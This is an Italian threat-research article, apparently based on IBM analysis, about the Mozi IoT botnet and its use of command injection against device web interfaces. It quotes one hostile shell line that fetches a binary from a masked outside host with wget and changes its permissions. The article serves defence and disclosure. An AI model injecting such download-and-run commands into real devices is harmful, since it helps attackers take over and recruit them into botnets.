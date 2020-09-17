Quasi tutti i targeting IoT osservati da IBM hanno tentato di utilizzare attacchi CMDi per ottenere l'accesso iniziale al dispositivo. Se l'endpoint bersaglio era un dispositivo IoT ed è vulnerabile a questi attacchi, il payload è stato scaricato ed eseguito.

Gli attacchi CMDi contro i dispositivi IoT sono estremamente diffusi per diversi motivi. Innanzitutto, i sistemi incorporati IoT contengono comunemente un'interfaccia web e un'interfaccia di debug residue dallo sviluppo del firmware, che possono essere sfruttate. In secondo luogo, i moduli PHP integrati nelle interfacce web IoT possono essere sfruttati per fornire agli attori malintenzionati funzionalità di esecuzione remota. E terzo, le interfacce IoT spesso rimangono vulnerabili quando vengono implementate, perché gli amministratori non riescono a renderle più sicure sanificando gli input remoti previsti. Questo consente agli attori delle minacce di inserire comandi shell come "wget".

La nostra analisi ha rivelato che il botnet Mozi utilizza CMDi utilizzando un comando shell "wget", modificando poi le autorizzazioni per consentire all'attore della minaccia di interagire con il sistema interessato. Ad esempio:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

Se l'host era vulnerabile a CMDi, questo comando scaricava ed eseguiva un file chiamato "mozi.a." La nostra analisi di questo particolare esempio indica che il file viene eseguito su un microprocessore senza un'architettura a fasi di pipeline interbloccate (MIPS). Questa è un'estensione compresa dalle macchine che eseguono un'architettura RISC (Reduced Instruction Set Computer), molto diffusa su molti dispositivi IoT. Una volta che l'attaccante ottiene pieno accesso al dispositivo tramite il botnet, il livello firmware può essere modificato e ulteriori malware possono essere installati sul dispositivo.

Sebbene questo esempio citi un vettore ben noto, può continuare a essere efficace per due motivi principali. In primo luogo, le nuove vulnerabilità consentono un aggiornamento costante dei tentativi di sfruttamento tramite CMDi, e l'implementazione lenta delle patch può essere sfruttata. In secondo luogo, questa attività è facilmente automatizzabile, consentendo agli attori delle minacce di colpire un'ampia fascia di dispositivi in modo rapido e a basso costo.

L'infrastruttura botnet Mozi sembra provenire principalmente dalla Cina, che rappresenta l'84% dell'infrastruttura osservata. Questo fatto è in linea con altre ricerche open source sulle attività IoT nel 2020.

Di seguito è riportato un elenco delle vulnerabilità che IBM ha osservato che il botnet Mozi ha tentando di utilizzare: